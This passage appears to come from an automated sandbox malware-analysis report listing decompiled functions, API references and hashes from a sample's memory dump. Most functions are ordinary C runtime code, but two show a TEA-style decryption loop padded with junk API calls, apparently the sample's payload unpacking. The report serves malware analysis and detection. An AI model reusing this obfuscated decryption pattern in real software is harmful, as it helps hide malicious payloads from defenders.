Instruction ID: 57d0a6ecc1cad4e6ab15008b744191ff4a238e2872d960fa128aec9b581cd1d3
Opcode Fuzzy Hash: 02cee7d4ee86e4cc822ed6d978d1876af1daa32e2c9aa6aef9fd0d2926bb3944
Instruction Fuzzy Hash: DBF03071A00A09E2DF002BA5BE0E6BF7A78BBC4745F9205B5E1D2B40E5DF348075D25A

Uniqueness

Uniqueness Score: -1.00%

Function 00415899 Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00415899(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E00407DE5( &_v20, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E00410E72( *_t72 & 0x000000ff,  &_v20) == 0) {
								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								_t54 = E00407A37();
								 *_t54 = 0x2a;
								if(_v8 != 0) {
									_t54 = _v12;
									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							if(_t65 <= 1 || _a12 < _t65) {
								L17:
								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
								_t56 = _v20;
								if(_t58 != 0) {
									L19:
									_t57 =  *(_t56 + 0xac);
									if(_v8 == 0) {
										return _t57;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t57;
								}
								goto L17;
							}
						}
						_t59 = _a4;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004158a3
0x004158aa
0x004158c1
0x00000000
0x004158b1
0x004158b3
0x004158cd
0x004158d8
0x0041590a
0x004159a8
0x004158e8
0x004158eb
0x004158f0
0x004158f0
0x00000000
0x004158f6
0x0041596a
0x0041596a
0x0041596f
0x00415978
0x0041597a
0x0041597d
0x0041597d
0x00000000
0x00415981
0x0041590c
0x0041590f
0x00415918
0x0041593f
0x00415948
0x00000000
0x00000000
0x00000000
0x00000000
0x0041591f
0x00415932
0x0041593a
0x0041593d
0x0041594f
0x0041594f
0x00415958
0x004158c6
0x004158c6
0x00415961
0x00000000
0x00415961
0x00000000
0x0041593d
0x00415918
0x004158da
0x004158df
0x004158e5
0x004158e5
0x00000000
0x004158b5
0x004158b5
0x004158ba
0x004158be
0x004158be
0x00000000
0x004158ba
0x004158b3

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004158CD
__isleadbyte_l.LIBCMT ref: 00415901
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000020), ref: 00415932
MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,?,?,00000000,00000000,00000000,00000020), ref: 004159A0

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3165f7a1591a3e5126c19513f8fe7a8072614e85e309bf4bbe1f791783791db4
Instruction ID: ec5796e9c8a6976b4aba741237d0039bc9180dcf3f7e8c6efdb4566ece476920
Opcode Fuzzy Hash: 3165f7a1591a3e5126c19513f8fe7a8072614e85e309bf4bbe1f791783791db4
Instruction Fuzzy Hash: AF31DF71A10786EFDB10EFA4C8809EE3BB0FF41320F14856AE4619B2A1D734DD91DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040889C Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040889C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0040818D(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0040827D(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004087A2(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004086E7(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004088a1
0x004088a7
0x0040891a
0x00000000
0x004088ae
0x004088ae
0x004088b1
0x004088cc
0x004088cf
0x004088ef
0x00408901
0x004088d1
0x004088d1
0x004088d4
0x00000000
0x004088d6
0x004088e8
0x004088e8
0x004088d4
0x0040891f
0x00408923
0x004088b3
0x004088cb
0x004088cb
0x004088b1

APIs

__cftof_l.LIBCMT ref: 004088C2

Part of subcall function 004086E7: __fltout2.LIBCMT ref: 00408713

__cftog_l.LIBCMT ref: 004088E8
__cftoe_l.LIBCMT ref: 0040891A

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 19b88a8126ccfeb9b30191c1c46ef1a0eabf4c77fa7b0ab52f6ac590ac67130b
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: F611837200014EBBCF126E85CD05CEE3F22BF58354B58846AFA9869175CB3BC971AB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040E67F Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040E67F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x418568);
				E0040B9DC(__ebx, __edi, __esi);
				_t29 = E00409512(__ebx, __edx, _t31);
				_t13 =  *0x42cbb4; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E0040AEE2(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x42cc98; // 0x42cbc0
					 *((intOrPtr*)(_t30 - 0x1c)) = E0040E641(_t8, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E0040E6E9();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00409512(_t22, __edx, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E0040CB0F(_t25, 0x20);
				}
				return E0040BA21(_t29);
			}

0x0040e67f
0x0040e67f
0x0040e67f
0x0040e67f
0x0040e67f
0x0040e681
0x0040e686
0x0040e690
0x0040e692
0x0040e69a
0x0040e6be
0x0040e6c0
0x0040e6c6
0x0040e6ca
0x0040e6cd
0x0040e6d8
0x0040e6db
0x0040e6e2
0x0040e69c
0x0040e69c
0x0040e6a0
0x00000000
0x0040e6a2
0x0040e6a7
0x0040e6a7
0x0040e6a0
0x0040e6ac
0x0040e6b0
0x0040e6b5
0x0040e6bd

APIs

__getptd.LIBCMT ref: 0040E68B

Part of subcall function 00409512: __getptd_noexit.LIBCMT ref: 00409515
Part of subcall function 00409512: __amsg_exit.LIBCMT ref: 00409522

__getptd.LIBCMT ref: 0040E6A2
__amsg_exit.LIBCMT ref: 0040E6B0
__lock.LIBCMT ref: 0040E6C0

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 2455b8867dcdb927ccdc6165670b750a8811849d711ce990018c8ce486c4457f
Instruction ID: d31bda54aa689c2b7a6ddd1ad9f9c0239bded3712d5880fca87267f077040aa8
Opcode Fuzzy Hash: 2455b8867dcdb927ccdc6165670b750a8811849d711ce990018c8ce486c4457f
Instruction Fuzzy Hash: 4DF06D32A403049BD621EBABA40279D32A0AF10718F904A7FA440B72D2CB3D9951DE9E

Uniqueness

Uniqueness Score: -1.00%

Function 004044B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004044B0(signed int _a4, signed int _a8) {
				unsigned int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				unsigned int _t43;
				signed int _t49;
				signed int _t55;
				unsigned int* _t63;
				intOrPtr* _t64;
				char _t73;
				signed int _t74;
				unsigned int _t75;

				_t64 = _a8;
				_t63 = _a4;
				_t43 =  *_t63;
				_v28 =  *_t64;
				_t75 = _t63[1];
				_v32 =  *((intOrPtr*)(_t64 + 4));
				_t73 = 0xc6ef3720;
				_v8 = _t43;
				_v12 = 0xc6ef3720;
				_v20 =  *((intOrPtr*)(_t64 + 8));
				_v24 =  *((intOrPtr*)(_t64 + 0xc));
				_v16 = 0x20;
				while(1) {
					_a4 = (_t43 << 4) + _v20;
					_a8 = _t43 >> 5;
					_a8 = _a8 + _v24;
					_push(_t73 + _t43);
					_push( &_a4);
					 *0x5565fc = 0xffcf03fc;
					E00403E1E();
					_t49 = _a8 ^ _a4;
					 *0x5565fc =  *0x5565fc & 0x00000000;
					_t75 = _t75 - _t49;
					_a8 = _t49;
					_a4 = _t75 << 4;
					_a4 = _a4 + _v28;
					_t74 = _t73 + _t75;
					if( *0x557154 == 0x1be) {
						__imp__RequestWakeupLatency(0);
						CreateSemaphoreA(0, 0, 0, 0);
					}
					 *0x556604 =  *0x556604 | 0xffffffff;
					_a4 = _a4 ^ _t74;
					_t55 = (_t75 >> 5) + _v32;
					 *0x556600 = 0xff6b3619;
					_push(_t55);
					_a8 = _t55;
					_push( &_a4);
					E00403E1E();
					_v8 = _v8 - _a4;
					E00403DF3( &_v12, 0x9e3779b9);
					_t39 =  &_v16;
					 *_t39 = _v16 - 1;
					_t43 = _v8;
					if( *_t39 == 0) {
						break;
					}
					_t73 = _v12;
				}
				_t63[1] = _t75;
				 *_t63 = _t43;
				return _t43;
			}

0x004044b6
0x004044bc
0x004044bf
0x004044c1
0x004044c8
0x004044cb
0x004044d5
0x004044da
0x004044dd
0x004044e0
0x004044e3
0x004044e6
0x004044f2
0x004044fa
0x00404503
0x00404509
0x0040450c
0x00404510
0x00404511
0x0040451b
0x00404523
0x00404526
0x0040452d
0x0040452f
0x00404537
0x0040453d
0x00404540
0x0040454c
0x00404550
0x0040455c
0x0040455c
0x00404562
0x00404569
0x00404571
0x00404574
0x0040457e
0x0040457f
0x00404585
0x00404586
0x0040458e
0x0040459a
0x0040459f
0x0040459f
0x004045a2
0x004045a5
0x00000000
0x00000000
0x004044ef
0x004044ef
0x004045ac
0x004045b0
0x004045b4

APIs

RequestWakeupLatency.KERNEL32(00000000,?,?,?,9E3779B9,?,?,?,?), ref: 00404550
CreateSemaphoreA.KERNEL32 ref: 0040455C

Strings

, xrefs: 004044E6

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateLatencyRequestSemaphoreWakeup
String ID:
API String ID: 2006799495-3916222277
Opcode ID: 0eb82fd03b348087bd45211c961d9e2cc6cf7949bf343311f87aeb407d63acd7
Instruction ID: cc64bf41ec901de7807c0f5813e53aab430dd298e59a5649dfc116f49a635d9b
Opcode Fuzzy Hash: 0eb82fd03b348087bd45211c961d9e2cc6cf7949bf343311f87aeb407d63acd7
Instruction Fuzzy Hash: BF31ECB5900219EFDB00CFA9C48599EBBF8FF48355F50C16AE919EB250D3349A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004044AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004044AF(void* __edx, signed int _a4, signed int _a8) {
				unsigned int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v117;
				unsigned int _t45;
				signed int _t51;
				signed int _t57;
				unsigned int* _t66;
				intOrPtr* _t68;
				char _t79;
				signed int _t80;
				unsigned int _t83;

				_v117 = _v117 + __edx;
				_t68 = _a8;
				_t66 = _a4;
				_t45 =  *_t66;
				_v28 =  *_t68;
				_t83 = _t66[1];
				_v32 =  *((intOrPtr*)(_t68 + 4));
				_t79 = 0xc6ef3720;
				_v8 = _t45;
				_v12 = 0xc6ef3720;
				_v20 =  *((intOrPtr*)(_t68 + 8));
				_v24 =  *((intOrPtr*)(_t68 + 0xc));
				_v16 = 0x20;
				while(1) {
					_a4 = (_t45 << 4) + _v20;
					_a8 = _t45 >> 5;
					_a8 = _a8 + _v24;
					_push(_t79 + _t45);
					_push( &_a4);
					 *0x5565fc = 0xffcf03fc;
					E00403E1E();
					_t51 = _a8 ^ _a4;
					 *0x5565fc =  *0x5565fc & 0x00000000;
					_t83 = _t83 - _t51;
					_a8 = _t51;
					_a4 = _t83 << 4;
					_a4 = _a4 + _v28;
					_t80 = _t79 + _t83;
					if( *0x557154 == 0x1be) {
						__imp__RequestWakeupLatency(0);
						CreateSemaphoreA(0, 0, 0, 0);
					}
					 *0x556604 =  *0x556604 | 0xffffffff;
					_a4 = _a4 ^ _t80;
					_t57 = (_t83 >> 5) + _v32;
					 *0x556600 = 0xff6b3619;
					_push(_t57);
					_a8 = _t57;
					_push( &_a4);
					E00403E1E();
					_v8 = _v8 - _a4;
					E00403DF3( &_v12, 0x9e3779b9);
					_t41 =  &_v16;
					 *_t41 = _v16 - 1;
					_t45 = _v8;
					if( *_t41 != 0) {
						_t79 = _v12;
						continue;
					}
					_t66[1] = _t83;
					 *_t66 = _t45;
					return _t45;
				}
			}

0x004044af
0x004044b6
0x004044bc
0x004044bf
0x004044c1
0x004044c8
0x004044cb
0x004044d5
0x004044da
0x004044dd
0x004044e0
0x004044e3
0x004044e6
0x004044f2
0x004044fa
0x00404503
0x00404509
0x0040450c
0x00404510
0x00404511
0x0040451b
0x00404523
0x00404526
0x0040452d
0x0040452f
0x00404537
0x0040453d
0x00404540
0x0040454c
0x00404550
0x0040455c
0x0040455c
0x00404562
0x00404569
0x00404571
0x00404574
0x0040457e
0x0040457f
0x00404585
0x00404586
0x0040458e
0x0040459a
0x0040459f
0x0040459f
0x004045a2
0x004045a5
0x004044ef
0x00000000
0x004044ef
0x004045ac
0x004045b0
0x004045b4
0x004045b4

APIs

RequestWakeupLatency.KERNEL32(00000000,?,?,?,9E3779B9,?,?,?,?), ref: 00404550
CreateSemaphoreA.KERNEL32 ref: 0040455C

Strings

, xrefs: 004044E6

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateLatencyRequestSemaphoreWakeup
String ID:
API String ID: 2006799495-3916222277
Opcode ID: 81c969f4688928daf9f615fa05fa870140ee97bc1cd20f437ee572b840144bf4
Instruction ID: c022bd11821d03e692977b1f4f15d8c9e0db611d7fe6b8fe4fbda9f3c376d92a
Opcode Fuzzy Hash: 81c969f4688928daf9f615fa05fa870140ee97bc1cd20f437ee572b840144bf4
Instruction Fuzzy Hash: B0311CB1900218EFDB00CFA9C884A9EBBF8FF48354F10C16AE919EB250D3349A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00409DE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00409DE3(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00406DFD(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00409512(__ebx, __edx, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00409512(__ebx, __edx, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
							_t17 = E00406DD6( *((intOrPtr*)(_t28 + 0x18)));
							_t38 = _t17;
							if(_t17 != 0) {
								_push( *((intOrPtr*)(_t29 + 0x10)));
								_push(_t28);
								return E00409B7B(_t38);
							}
						}
					}
				}
				return _t17;
			}

0x00409de3
0x00409de3
0x00409de6
0x00409dec
0x00409dfa
0x00409e00
0x00409e08
0x00409e14
0x00409e1c
0x00409e24
0x00409e38
0x00409e43
0x00409e49
0x00409e4b
0x00409e4d
0x00409e50
0x00000000
0x00409e57
0x00409e4b
0x00409e38
0x00409e24
0x00409e58

APIs

Part of subcall function 00406DFD: __getptd.LIBCMT ref: 00406E03
Part of subcall function 00406DFD: __getptd.LIBCMT ref: 00406E13

__getptd.LIBCMT ref: 00409DF2

Part of subcall function 00409512: __getptd_noexit.LIBCMT ref: 00409515
Part of subcall function 00409512: __amsg_exit.LIBCMT ref: 00409522

__getptd.LIBCMT ref: 00409E00

Strings

csm, xrefs: 00409E0E

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 70aa3b42a859bc27a122939194ef38eab9ee9ac4b25228116e72d4fe29761a82
Instruction ID: 1240bdf0a63cacbcf5ace55a296ce2fd6dff42ec2483333423e0cb720c473221
Opcode Fuzzy Hash: 70aa3b42a859bc27a122939194ef38eab9ee9ac4b25228116e72d4fe29761a82
Instruction Fuzzy Hash: CF0128368013459ACF34EF26C444AAEB3B5BF10715F54493FE085766E2CB389D94DB89

Uniqueness

Uniqueness Score: -1.00%

Function 00406401 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E00406401() {
				intOrPtr _v16;
				void* _v28;
				void* _v64;
				void* _v104;
				void* __esi;
				void* _t17;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				intOrPtr* _t22;
				void* _t24;

				_push(0x44);
				E0040731A(E00415DEC, _t17, _t20, _t21);
				E00405A38(_t24 - 0x28, _t20, "invalid string position");
				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
				_t19 = _t24 - 0x50;
				E0040637A(_t19, _t24 - 0x28);
				E00406A7D(_t24 - 0x50, 0x4181a8);
				asm("int3");
				_push(_t24);
				_push(_t21);
				_push(_v16);
				_t22 = _t19;
				E00405A9F(_t19);
				 *_t22 = 0x40149c;
				return _t22;
			}

0x00406401
0x00406408
0x00406415
0x0040641a
0x00406422
0x00406425
0x00406433
0x00406438
0x0040643b
0x0040643e
0x0040643f
0x00406442
0x00406444
0x00406449
0x00406453

APIs

__EH_prolog3.LIBCMT ref: 00406408
__CxxThrowException@8.LIBCMT ref: 00406433

Part of subcall function 00406A7D: RaiseException.KERNEL32(?,?,|j@,?,?,?,?,?,00406A7C,?,h@~A,00557578,?,00405205,?), ref: 00406ABF

Part of subcall function 00405A9F: __EH_prolog.LIBCMT ref: 00405AA4
Part of subcall function 00405A9F: std::exception::exception.LIBCMT ref: 00405AB5

Strings

invalid string position, xrefs: 0040640D

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExceptionException@8H_prologH_prolog3RaiseThrowstd::exception::exception
String ID: invalid string position
API String ID: 3550033118-1799206989
Opcode ID: c1d101fb347f93dce07b9d728a26b91a4609d6f6a966017caeb88913e8f73cdb
Instruction ID: 7552e81f6852f15b5c4d52f5a4b032a413189625ab58f5dbca60e36dab62462b
Opcode Fuzzy Hash: c1d101fb347f93dce07b9d728a26b91a4609d6f6a966017caeb88913e8f73cdb
Instruction Fuzzy Hash: B1F01C72A00218A7CB10FAD2CC45EDEB778EF50365F14453BB605B61D2DABC99548B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405A66 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405A66(void* __edi) {
				intOrPtr* _t26;
				intOrPtr _t30;
				intOrPtr* _t34;
				void* _t36;

				E00406EB0(E00415D6E, _t36);
				E00405A38(_t36 - 0x28, __edi, "vector<T> too long");
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				_t26 = _t36 - 0x50;
				E004059F9(_t26, _t36 - 0x28);
				E00406A7D(_t36 - 0x50, 0x417f4c);
				asm("int3");
				E00406EB0(E00415D80, _t36);
				_push(_t26);
				_push(__edi);
				_t30 =  *((intOrPtr*)(_t36 + 8));
				_t34 = _t26;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E004064D7(_t26, _t30);
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				_t31 = _t30 + 0xc;
				 *_t34 = 0x401460;
				E00405879(_t34 + 0xc, _t30 + 0xc, _t31);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x00405a6b
0x00405a7b
0x00405a80
0x00405a88
0x00405a8b
0x00405a99
0x00405a9e
0x00405aa4
0x00405aa9
0x00405aab
0x00405aac
0x00405aaf
0x00405ab2
0x00405ab5
0x00405aba
0x00405abe
0x00405ac5
0x00405acb
0x00405ad7
0x00405adf

APIs

__EH_prolog.LIBCMT ref: 00405A6B
__CxxThrowException@8.LIBCMT ref: 00405A99

Part of subcall function 00406A7D: RaiseException.KERNEL32(?,?,|j@,?,?,?,?,?,00406A7C,?,h@~A,00557578,?,00405205,?), ref: 00406ABF

Strings

vector<T> too long, xrefs: 00405A73

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExceptionException@8H_prologRaiseThrow
String ID: vector<T> too long
API String ID: 1681477883-3788999226
Opcode ID: 8c3031ba3a6622350d04cb4ce8e5b1b27fb0d801667b1a19860317c8fe9f82a1
Instruction ID: 541874f6c559136a1169ae94454034f240169b8584b29a69a84ea93e7979944c
Opcode Fuzzy Hash: 8c3031ba3a6622350d04cb4ce8e5b1b27fb0d801667b1a19860317c8fe9f82a1
